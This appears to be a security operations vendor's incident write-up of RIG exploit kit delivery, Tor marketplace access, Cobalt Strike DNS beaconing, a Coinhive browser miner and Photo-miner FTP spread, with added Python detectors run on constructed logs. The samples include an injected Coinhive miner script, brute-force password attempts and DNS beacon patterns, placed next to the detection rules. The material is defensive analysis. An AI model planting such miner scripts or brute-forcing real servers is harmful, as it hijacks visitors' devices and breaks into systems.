Discoveries made by the Cyberseer SOC

Published: 8th July

RIG Exploit Kit (RigEK)

Industry Sector: Financial
Threat Source: External

Cyberseer uses machine learning models to detect a device behaving abnormally. Analysts monitoring for this activity discovered a corporate device beaconing to a newly registered domain. The device had been redirected from a trusted domain to the malicious domain ‘kw9vf.ugdfftp [.] top’, which was serving a malicious Flash (SWF) object. The models flagged two departures from this device’s baseline: it was not normally redirected from other sites, and it did not normally download Flash content.

Alerted quickly, the analyst carried out an in-depth analysis of the network traffic, the payload and the timeline, which identified the infamous RIG Exploit Kit. RIG is known to distribute a range of malware, including worms, RATs (Remote Access Trojans) and ransomware.

Machine learning is always up to date!

Exploit kits bundle exploits for known vulnerabilities so that an attacker has several routes to the same goal; they commonly target browsers, browser plugins and the operating system, and Flash Player is a favourite because it is so often left unpatched. The user does not have to agree to anything: the exploit runs inside the browser plugin as soon as the page loads. In this case the redirect came from a legitimate-looking site, so nothing about the visit looked suspicious to the user.

In this incident the download was not stopped by the organisation’s web security gateway, which shows the value of behavioural detection alongside static rules and signatures: the gateway needs a signature for the file or the domain, whereas the behavioural model only needs the device to act out of character. Cyberseer promptly identified and reported the incident to the customer, and the timeline of events built during the investigation made it quick to check which other devices might be affected.
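The two baseline checks described above (a domain the organisation has never contacted, and a device that does not normally fetch Flash), plus the referer walk used to rebuild the redirect chain for the timeline, as an added example that is not Cyberseer’s detection code. The proxy log lines, the 30-day baseline, the device names and the log format are all constructed for the example.

```python
"""Drive-by Flash delivery spotted against a behavioural baseline.

Added example, not Cyberseer's detection code. The proxy log lines, the
30-day domain baseline and the device names are constructed. Assumed log
format: "<ts> <device> <method> <url> <referer> <content-type> <status>",
with "-" for an empty referer.
"""
from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import urlparse

FLASH_TYPES = {"application/x-shockwave-flash", "application/vnd.adobe.flash.movie"}

# Constructed sample: WS-0412 is bounced from a news site to a domain the
# organisation has never contacted, which then serves a Flash object.
# WS-0207 (a digital-signage box) fetches Flash from a known vendor CDN.
PROXY_LOG = """\
2020-07-01T09:14:02Z WS-0412 GET http://news.example-daily.test/index.html - text/html 200
2020-07-01T09:14:03Z WS-0412 GET http://news.example-daily.test/ads/banner.js http://news.example-daily.test/index.html application/javascript 200
2020-07-01T09:14:04Z WS-0412 GET http://kw9vf.ugdfftp.top/?q=abc123 http://news.example-daily.test/ads/banner.js text/html 200
2020-07-01T09:14:05Z WS-0412 GET http://kw9vf.ugdfftp.top/index.php?v=1 http://kw9vf.ugdfftp.top/?q=abc123 application/x-shockwave-flash 200
2020-07-01T09:15:10Z WS-0207 GET http://intranet.corp.test/portal/ - text/html 200
2020-07-01T09:16:30Z WS-0207 GET http://cdn.vendor.test/player.swf http://intranet.corp.test/portal/ application/x-shockwave-flash 200
"""

# Constructed baseline: domains contacted by the organisation in the last 30
# days, and devices that routinely download Flash content.
ORG_BASELINE = {"news.example-daily.test", "intranet.corp.test", "cdn.vendor.test"}
FLASH_DEVICES = {"WS-0207"}


@dataclass
class Request:
    ts: str
    device: str
    method: str
    url: str
    referer: str
    ctype: str
    status: str

    @property
    def host(self) -> str:
        return urlparse(self.url).hostname or ""

    @property
    def referer_host(self) -> str:
        if self.referer == "-":
            return ""
        return urlparse(self.referer).hostname or ""


def parse_log(text: str) -> list:
    return [Request(*line.split()) for line in text.splitlines() if line.strip()]


def is_flash(req: Request) -> bool:
    return req.ctype in FLASH_TYPES or urlparse(req.url).path.lower().endswith(".swf")


def detect(requests, org_baseline=ORG_BASELINE, flash_devices=FLASH_DEVICES) -> list:
    """Alert on requests that combine at least two abnormal traits."""
    alerts = []
    for req in requests:
        reasons = []
        if req.host not in org_baseline:
            reasons.append("domain never seen by the organisation")
        if (req.referer_host and req.referer_host != req.host
                and req.referer_host in org_baseline and req.host not in org_baseline):
            reasons.append("redirected from a trusted domain to an unknown one")
        if is_flash(req) and req.device not in flash_devices:
            reasons.append("device does not normally download Flash")
        if len(reasons) >= 2:
            alerts.append({"device": req.device, "host": req.host,
                           "url": req.url, "reasons": reasons})
    return alerts


def redirect_chain(requests, final: Request) -> list:
    """Walk referers backwards to rebuild the hop sequence that led to `final`."""
    by_url = {r.url: r for r in requests if r.device == final.device}
    chain, cur = [final.url], final
    while cur.referer in by_url and cur.referer not in chain:
        cur = by_url[cur.referer]
        chain.append(cur.url)
    return list(reversed(chain))


if __name__ == "__main__":
    reqs = parse_log(PROXY_LOG)
    for alert in detect(reqs):
        print(f"{alert['device']} -> {alert['host']}: {'; '.join(alert['reasons'])}")
    landing = next(r for r in reqs if r.device == "WS-0412" and is_flash(r))
    print(" -> ".join(redirect_chain(reqs, landing)))
```

Requiring two independent anomalies before alerting is what keeps a rarity-based rule usable: a single never-seen domain is routine, and a signage box fetching Flash is its normal behaviour, but a workstation pulled off a trusted site onto an unknown domain that hands it a SWF is exactly the exploit-kit pattern.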


Shedding light onto ‘dark web’ marketplace access

Industry Sector: Retail
Threat Source: Internal

Tor use inside an enterprise immediately raises suspicion, and it increases risk by exposing the device to malicious sites that are reachable only over Tor. Tor provides anonymity by routing the user’s traffic through a chain of relays, each of which knows only the previous and next hop, so the destination cannot be linked back to the source. The side effect, from the network’s point of view, is a device sending traffic to unfamiliar relay addresses rather than to the sites it normally uses.

As a result, outbound Tor traffic stands out to an analyst who looks for the known indicators: .onion hostnames, Tor’s default ports (9001 and 9030 for relays, 9050 and 9150 for the local SOCKS proxy), connections to addresses published in the Tor relay directory, and the self-signed TLS certificates Tor relays present, whose subject and issuer names are randomly generated hostnames.

When Cyberseer analysts detect a corporate device using the Tor network, this can indicate either a user or malicious software trying to hide its destination. In this example, Cyberseer observed onion domains in the device’s web traffic.

Quick detection, quick investigation, quick response!

Analysts identified that the destination onion site was a ‘dark web’ marketplace where users buy and sell information, and that the actor was using it to sell stolen PII (personally identifiable information).

Cyberseer analysts corroborated the activity by observing abnormal amounts of data being sent to known Tor infrastructure. With high confidence that the activity was malicious, Cyberseer alerted the customer immediately and provided a comprehensive report, which enabled them to contain and examine the user and device involved.
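The indicator list given earlier in this section (onion hostnames, default relay ports, relay addresses, random-hostname certificates) combined with the volume check just described, as an added example that is not Cyberseer’s code. The connection records, the relay address list (drawn from TEST-NET ranges) and the byte threshold are constructed; a real deployment would load relay addresses from the Tor directory consensus, and the certificate check is a heuristic rather than proof.

```python
"""Tor indicators and volume in enterprise egress telemetry.

Added example, not Cyberseer's code. The connection records, the relay
address list (TEST-NET ranges) and the byte threshold are constructed; a
real deployment would load relay addresses from the Tor directory consensus.
"""
import re
from collections import defaultdict
from typing import NamedTuple

RELAY_PORTS = {9001, 9030}      # default ORPort / DirPort (relays may also use 443)
# Tor relays present self-signed link certificates whose subject and issuer are
# two different randomly generated hostnames of this shape (heuristic, not proof).
RANDOM_HOST_CN = re.compile(r"^www\.[a-z0-9]{8,20}\.(com|net)$")
TOR_BYTES_THRESHOLD = 50 * 1024 * 1024   # constructed: per device per day
KNOWN_RELAYS = {"203.0.113.10", "203.0.113.77", "198.51.100.5"}   # constructed


class Conn(NamedTuple):
    device: str
    dst_ip: str
    dst_port: int
    host: str          # SNI or HTTP Host header, "" if none
    cert_subject: str  # server certificate subject CN, "" if no TLS
    cert_issuer: str
    bytes_out: int


# Constructed records: LT-0931 talks to relays and requests an onion name via
# the proxy; WS-0044 is ordinary browsing plus one stray hit on port 9030.
CONNECTIONS = [
    Conn("LT-0931", "203.0.113.10", 443, "", "www.x7k2pq9m4zab.com", "www.r3wq8n5tlaqe.net", 41_000_000),
    Conn("LT-0931", "203.0.113.77", 9001, "", "www.ab12cd34ef56.com", "www.zz99yy88xx77.net", 12_000_000),
    Conn("LT-0931", "", 0, "buy-sell-example.onion", "", "", 2_000),
    Conn("WS-0044", "198.51.100.200", 443, "www.example.com", "www.example.com", "DigiCert TLS RSA SHA256 2020 CA1", 120_000),
    Conn("WS-0044", "198.51.100.201", 9030, "", "", "", 1_500),
]


def indicators(c: Conn) -> list:
    found = []
    if c.host.endswith(".onion"):
        found.append("onion hostname")
    if c.dst_ip in KNOWN_RELAYS:
        found.append("known Tor relay address")
    if c.dst_port in RELAY_PORTS:
        found.append(f"Tor default port {c.dst_port}")
    if (RANDOM_HOST_CN.match(c.cert_subject) and RANDOM_HOST_CN.match(c.cert_issuer)
            and c.cert_subject != c.cert_issuer):
        found.append("random-hostname self-signed certificate")
    return found


def analyse(conns, threshold=TOR_BYTES_THRESHOLD) -> dict:
    """Per device: distinct indicators, bytes sent over suspected Tor, severity."""
    per_device = defaultdict(lambda: {"indicators": set(), "tor_bytes": 0})
    for c in conns:
        found = indicators(c)
        if found:
            per_device[c.device]["indicators"].update(found)
            per_device[c.device]["tor_bytes"] += c.bytes_out
    report = {}
    for dev, d in per_device.items():
        if d["tor_bytes"] >= threshold:
            severity = "high"       # Tor plus a data volume that suggests exfiltration
        elif len(d["indicators"]) >= 2:
            severity = "medium"     # corroborated Tor use
        else:
            severity = "low"        # a single weak indicator, e.g. one port hit
        report[dev] = {"indicators": sorted(d["indicators"]),
                       "tor_bytes": d["tor_bytes"], "severity": severity}
    return report


if __name__ == "__main__":
    for dev, r in analyse(CONNECTIONS).items():
        print(dev, r["severity"], r["tor_bytes"], ", ".join(r["indicators"]))
```

A single port hit is deliberately rated low: plenty of legitimate services use 9001 and 9030. It is the combination of relay address, relay-style certificate and an onion name, and then the volume of data sent through them, that turns a curiosity into a contain-and-investigate alert.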

Usage of Cobalt Strike – Fighting back!

Industry Sector: Financial
Threat Source: Internal

Cyberseer uses tools that build machine learning profiles of the devices on the network by observing their characteristics and normal behaviour. When a ‘rogue’ device is added to the network, it does not conform to these learned behaviours, which makes it easier to spot. In this case, the analysts were alerted instantly to a device generating abnormal network traffic.

The device was seen making a large volume of unusual DNS requests to domains associated with the adversary simulation tool “Cobalt Strike”. Cyberseer could then build a timeline of how and when the anomalous activity started.

Cobalt Strike’s primary purpose is adversary simulation and ‘Red Team’ operations: it reproduces the methods and tactics a threat actor uses to move laterally through a network. One of its features is the ability of its Beacon payload to use DNS as a command-and-control channel, encoding tasking and results in DNS queries and responses to a domain the operator controls. DNS remains unfiltered, and usually uninspected, on the vast majority of corporate networks.
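What a DNS command-and-control channel looks like in a query log, and the heuristics that separate it from normal resolution, as an added example that is not Cyberseer’s code and not a Cobalt Strike signature. The query log is generated inside the example (constructed), the domain names are placeholders and the thresholds are illustrative; the shape it looks for (one parent domain, a never-repeating stream of long hex-encoded subdomains, a high share of TXT lookups) is the generic footprint of data being carried in DNS names and records.

```python
"""Heuristics for DNS used as a command-and-control channel.

Added example, not Cyberseer's code and not a Cobalt Strike signature: the
query log is generated here (constructed), the domain names are placeholders
and the thresholds are illustrative.
Assumed log format: "<ts> <device> <qtype> <qname>".
"""
import re
from collections import defaultdict

HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")


def constructed_log() -> str:
    lines = []
    # Benign: a workstation resolving the same few names over and over.
    for i in range(30):
        lines.append(f"2020-07-01T10:{i:02d}:00Z WS-0102 A mail.corp.test")
        lines.append(f"2020-07-01T10:{i:02d}:01Z WS-0102 A cdn.vendor.test")
    # Suspicious: 30 lookups under one domain, every subdomain unique, labels
    # hex encoded, half of them TXT. This is the shape of a DNS beacon, which
    # carries tasking and results in the names and records themselves.
    for i in range(30):
        enc = f"{(i * 2654435761) & 0xffffffff:08x}{(i * 0x9e3779b1) & 0xffffffff:08x}"
        qtype = "TXT" if i % 2 else "A"
        lines.append(f"2020-07-01T10:{i:02d}:00Z WS-0377 {qtype} {enc}.{enc[::-1]}.update-cdn-example.test")
    return "\n".join(lines)


def registered_domain(qname: str) -> str:
    # Last two labels; a real deployment would use the Public Suffix List.
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])


def profile(log_text: str) -> dict:
    """Aggregate query statistics per (device, registered domain)."""
    stats = defaultdict(lambda: {"queries": 0, "txt": 0, "subdomains": set(),
                                 "labels": 0, "label_chars": 0, "hex_labels": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, device, qtype, qname = line.split()
        domain = registered_domain(qname)
        s = stats[(device, domain)]
        s["queries"] += 1
        if qtype == "TXT":
            s["txt"] += 1
        sub = qname.rstrip(".")[: -len(domain)].rstrip(".")
        if sub:
            labels = sub.split(".")
            s["subdomains"].add(sub)
            s["labels"] += len(labels)
            s["label_chars"] += sum(len(lbl) for lbl in labels)
            s["hex_labels"] += sum(1 for lbl in labels if HEX_LABEL.match(lbl))
    return stats


def reasons(s: dict) -> list:
    out = []
    uniq = len(s["subdomains"])
    if uniq >= 20 and uniq / s["queries"] > 0.8:
        out.append(f"{uniq} distinct subdomains in {s['queries']} queries")
    if s["labels"] and s["label_chars"] / s["labels"] >= 12:
        out.append("long labels (mean >= 12 chars)")
    if s["labels"] and s["hex_labels"] / s["labels"] >= 0.5:
        out.append("mostly hex-encoded labels")
    if s["txt"] / s["queries"] >= 0.3:
        out.append("high TXT ratio")
    return out


def suspicious(log_text: str) -> dict:
    """Map (device, domain) to the heuristics it trips, for pairs that trip any."""
    flagged = {}
    for key, s in profile(log_text).items():
        r = reasons(s)
        if r:
            flagged[key] = r
    return flagged


if __name__ == "__main__":
    for (device, domain), r in suspicious(constructed_log()).items():
        print(f"{device} -> {domain}: {'; '.join(r)}")
```

Aggregating per registered domain is the important design choice: each individual query looks harmless, and the parent domain may even have a plausible name, but no legitimate service needs a device to resolve dozens of unique 16-character hex subdomains under it in half an hour. The same profile also gives the analyst the start time of the first odd query for the timeline.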

Unlike many other toolsets, Cobalt Strike can also use a wide array of techniques to emulate post-exploitation actions, in conjunction with other tools such as Metasploit. Once the tool was identified, the customer was notified immediately and was able to stop it in its tracks.

While investigating this incident, Cyberseer identified the key execution characteristics of the data exfiltration, log collection and enumeration by spotting the corresponding changes in the network traffic. As soon as the threat was noticed, analysts conveyed its severity to the customer.

Cryptomining ‘Monero’

Industry Sector: Financial
Threat Source: External

Coinhive was a cryptocurrency mining service (shut down in March 2019) that let website owners profit from their visitors: a JavaScript library embedded in the page ran a Monero miner in the visitor’s browser for as long as the page stayed open.

Because of the computation involved, the performance of the victim’s device can be severely degraded, even though each visitor contributes only a small share of the mining work. Attackers also compromise legitimate websites and inject the mining script, so that unsuspecting visitors unknowingly mine for the attacker.
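How a fetched copy of a suspect page can be checked for an injected browser miner, as an added example that is not Cyberseer’s code. The HTML is constructed; the Coinhive script URL and the `CoinHive.Anonymous(...).start()` call are the real API the service exposed, while the remaining indicators are heuristics for forks and self-hosted miners and will miss obfuscated loaders. The indicator weights and the alert threshold are assumptions.

```python
"""Static check of a fetched page for in-browser cryptomining.

Added example, not Cyberseer's code. The HTML is constructed; the Coinhive
script URL and `CoinHive.Anonymous(...).start()` API are the real ones the
service used, while the generic indicators are heuristics for forks and
self-hosted miners and will miss obfuscated loaders.
"""
import re

# Constructed: a retail page with a miner injected after the footer.
COMPROMISED_PAGE = """\
<html><head><title>Shop - Summer Sale</title></head>
<body>
<div id="products">...</div>
<footer>&copy; 2020 Example Retail</footer>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('c0nstructedS1teKeyXXXXXXXXXXXXXXXX', {throttle: 0.3});
  miner.start();
</script>
</body></html>
"""

# Constructed: the same page without the injection.
CLEAN_PAGE = """\
<html><head><title>Shop - Summer Sale</title></head>
<body><div id="products">...</div>
<script src="/static/app.js"></script>
</body></html>
"""

# (name, weight, pattern). Weights are illustrative assumptions.
INDICATORS = [
    ("coinhive library", 5, re.compile(r"coinhive\.min\.js|authedmine\.min\.js", re.I)),
    ("coinhive miner object", 5, re.compile(r"new\s+CoinHive\.(Anonymous|User)\s*\(", re.I)),
    ("miner start call", 2, re.compile(r"\.start\s*\(\s*\)")),
    ("throttle option", 1, re.compile(r"throttle\s*:\s*0?\.\d+")),
    ("cryptonight reference", 3, re.compile(r"cryptonight", re.I)),
    ("websocket to pool", 2, re.compile(r"new\s+WebSocket\s*\(\s*['\"]wss?://[^'\"]*(pool|proxy|ws)[^'\"]*['\"]", re.I)),
    ("wasm instantiation", 1, re.compile(r"WebAssembly\.(instantiate|Module)")),
]
ALERT_SCORE = 6


def scan(html: str) -> dict:
    """Score the page by the miner indicators it contains."""
    hits = [(name, weight) for name, weight, pat in INDICATORS if pat.search(html)]
    score = sum(w for _, w in hits)
    return {"score": score, "hits": [n for n, _ in hits], "mining_likely": score >= ALERT_SCORE}


def site_keys(html: str) -> list:
    """Site keys identify the beneficiary and are useful pivots for intel lookups."""
    return re.findall(r"CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]{20,})['\"]", html)


if __name__ == "__main__":
    for label, page in (("compromised", COMPROMISED_PAGE), ("clean", CLEAN_PAGE)):
        r = scan(page)
        print(label, r["score"], r["mining_likely"], ", ".join(r["hits"]))
    print("site keys:", site_keys(COMPROMISED_PAGE))
```

The network-side symptom (a device holding an unusual number of long-lived connections to one retail site) is what raises the alert; pulling the page and confirming the injected miner is what lets the analyst say with confidence that the site, not the user, is the problem, and the site key is the pivot for checking which other pages carry the same injection.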

Cyberseer analysts use tools that identify rarity and anomalous characteristics in network traffic. Together with custom models, an analyst discovered a corporate device deviating from its normal behavioural pattern: it was making an unusual volume of external connections to a retail site.

Using various intelligence sources, the analyst determined that the website had been compromised to mine the ‘Monero’ cryptocurrency. The customer was notified and given a detailed report recommending stricter web controls for endpoints on the network, so that users could no longer reach the site and further infections were prevented.

Photo-miner Malware

Industry Sector: Financial
Threat Source: External

Photo-miner is a complex piece of malware that uses more than one method to propagate from device to device. The initial infection is typically downloaded from a compromised FTP server on which the attacker has previously uploaded malicious files. The malware then propagates along two routes: attacking further FTP servers from the infected machine, and attempting to spread across the infected machine’s local network.

Why FTP? FTP is not a secure protocol: it transmits usernames and passwords unencrypted, and servers are frequently deployed with weak configurations, such as simple passwords and no limit on failed login attempts, which leaves them open to brute forcing.

The Cyberseer SOC mindset

When a user navigated to one of these sites, Cyberseer analysts immediately asked why the user would need this insecure protocol at all. Digging deeper, an analyst determined that the FTP site had an obscure domain and that this was the first time the domain had been accessed from anywhere in the organisation.

This was possible because the machine learning keeps a baseline not only for that device but for the organisation as a whole. Using this information, analysts classified objects on the site as belonging to the photo-miner malware.

With an accurate classification, the analyst could use open source intelligence to identify the methods this malware uses to propagate to other internal devices and check whether any of them were being observed on the network.

Cyberseer also used this information to create meta models that raise the severity of any use of the legacy FTP protocol.
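The FTP weaknesses listed under “Why FTP?” (cleartext credentials, unlimited login attempts) and the first-contact check the analysts relied on, turned into checks over an FTP control-channel log, as an added example that is not Cyberseer’s code. The log lines, hostnames, passwords, baseline and thresholds are constructed, and the log format is an assumption; the sample reproduces the two stages the section describes, an initial download from a never-seen server and the infected host then brute-forcing another server and uploading a file.

```python
"""FTP abuse heuristics: cleartext credentials, brute forcing and first
contact with an unknown FTP server.

Added example, not Cyberseer's code. Log lines, hostnames, passwords and
thresholds are constructed. Assumed log format: "<ts> <src> <dst> <dir> <ftp line>"
where dir is ">" for client commands and "<" for server replies.
"""
from collections import defaultdict

FAILED_LOGIN_THRESHOLD = 4                 # constructed
ORG_FTP_BASELINE = {"ftp.partner.test"}    # constructed: FTP servers seen in the last 30 days
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".dll", ".bat")


def constructed_log() -> str:
    lines = [
        # Normal: a known partner server, still a cleartext password on the wire.
        "2020-07-01T11:00:01Z WS-0210 ftp.partner.test > USER reports",
        "2020-07-01T11:00:01Z WS-0210 ftp.partner.test > PASS Summer2020!",
        "2020-07-01T11:00:02Z WS-0210 ftp.partner.test < 230 Login successful.",
        "2020-07-01T11:00:05Z WS-0210 ftp.partner.test > RETR q2.csv",
        # Initial infection: first contact with an obscure server, binary fetched.
        "2020-07-01T11:02:00Z WS-0588 ftp.xk3j9-files.test > USER anonymous",
        "2020-07-01T11:02:00Z WS-0588 ftp.xk3j9-files.test > PASS guest",
        "2020-07-01T11:02:01Z WS-0588 ftp.xk3j9-files.test < 230 Login successful.",
        "2020-07-01T11:02:03Z WS-0588 ftp.xk3j9-files.test > RETR photo.scr",
    ]
    # Propagation: the infected host guesses passwords against another server,
    # gets in, and drops a file.
    for n, pw in enumerate(["admin", "123456", "password", "ftp", "qwerty"]):
        ts = f"2020-07-01T11:05:{n:02d}Z"
        lines += [f"{ts} WS-0588 www-host.victim.test > USER admin",
                  f"{ts} WS-0588 www-host.victim.test > PASS {pw}",
                  f"{ts} WS-0588 www-host.victim.test < 530 Login incorrect."]
    lines += ["2020-07-01T11:05:05Z WS-0588 www-host.victim.test > USER admin",
              "2020-07-01T11:05:05Z WS-0588 www-host.victim.test > PASS Admin2019",
              "2020-07-01T11:05:06Z WS-0588 www-host.victim.test < 230 Login successful.",
              "2020-07-01T11:05:09Z WS-0588 www-host.victim.test > STOR index.html"]
    return "\n".join(lines)


def analyse(log_text: str, baseline=ORG_FTP_BASELINE, threshold=FAILED_LOGIN_THRESHOLD) -> dict:
    """Map (src, dst) to a list of findings."""
    sessions = defaultdict(lambda: {"passwords": 0, "failed": 0, "success": False,
                                    "uploads": [], "downloads": []})
    for line in log_text.splitlines():
        _ts, src, dst, direction, *words = line.split()
        s = sessions[(src, dst)]
        if direction == ">":
            cmd, arg = words[0].upper(), " ".join(words[1:])
            if cmd == "PASS":
                s["passwords"] += 1          # credential crossed the network in cleartext
            elif cmd == "STOR":
                s["uploads"].append(arg)
            elif cmd == "RETR":
                s["downloads"].append(arg)
        elif words[0] == "530":
            s["failed"] += 1
        elif words[0] == "230":
            s["success"] = True

    findings = {}
    for (src, dst), s in sessions.items():
        out = []
        if dst not in baseline:
            out.append("first contact with this FTP server for the organisation")
            if any(f.lower().endswith(EXECUTABLE_SUFFIXES) for f in s["downloads"]):
                out.append("executable downloaded from never-seen server: " + ", ".join(s["downloads"]))
        if s["passwords"]:
            out.append(f"{s['passwords']} password(s) sent in cleartext")
        if s["failed"] >= threshold:
            out.append(f"brute force: {s['failed']} failed logins" + (", then success" if s["success"] else ""))
            if s["success"] and s["uploads"]:
                out.append("upload after brute force: " + ", ".join(s["uploads"]))
        if out:
            findings[(src, dst)] = out
    return findings


if __name__ == "__main__":
    for (src, dst), out in analyse(constructed_log()).items():
        print(f"{src} -> {dst}")
        for f in out:
            print("   ", f)
```

Note that the known partner server still produces a finding: every FTP login exposes a password to anyone on the path, which is the reason the analysts raised the severity of all FTP use rather than only the obscure domain. Since the source of the brute force is an internal workstation, the brute-force finding is the propagation signal the section describes, and a repeat of the same pattern from the same host against several servers is what to hunt for next.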
